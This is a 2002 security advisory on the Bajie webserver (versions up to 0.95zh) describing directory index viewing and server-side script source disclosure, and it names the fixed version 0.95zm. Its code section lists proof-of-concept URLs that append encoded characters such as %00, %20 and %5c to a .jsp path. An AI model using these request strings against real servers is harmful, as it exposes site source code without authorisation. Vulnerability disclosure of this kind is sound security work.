####################################################################### Luigi Auriemma Application: Bajie webserver http://viscomp.utdallas.edu/FACADE/websrv/ Versions: <= 0.95zh Platforms: any Bugs: - index viewing - server scripts download Exploitation: remote, via browser Date: 16 Aug 2002 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's website: "bj server is a fast jspservlet engine and a stand alone http web server. It is the smallest of this kind, support a wide range of features. It can also act as a servlet/jsp engine plugin for apache or IIS via AJP" ####################################################################### ======= 2) Bugs ======= ------------- Index viewing ------------- An attacker can view the index of a specific webdirectory also if the index file exists. It happens only when the option "show index" is enabled. ----------------------- Server scripts download ----------------------- An attacker can download all the server side scripts (.jar or .jsp for example) in the webserver root directory (htdocs) simply adding some special chars after the name of the file. ####################################################################### =========== 3) The Code =========== http://SERVER/jsp/hello.jsp%00 http://SERVER/jsp/hello.jsp%00 http://SERVER/jsp/hello.jsp%20 http://SERVER/jsp/hello.jsp%2b http://SERVER/jsp/hello.jsp+ http://SERVER/jsp/hello.jsp%2e http://SERVER/jsp/hello.jsp. http://SERVER/jsp/hello.jsp%2f http://SERVER/jsp/hello.jsp/ http://SERVER/jsp/hello.jsp%5c http://SERVER/jsp/hello.jsp\ ####################################################################### ====== 4) Fix ====== 0.95zm #######################################################################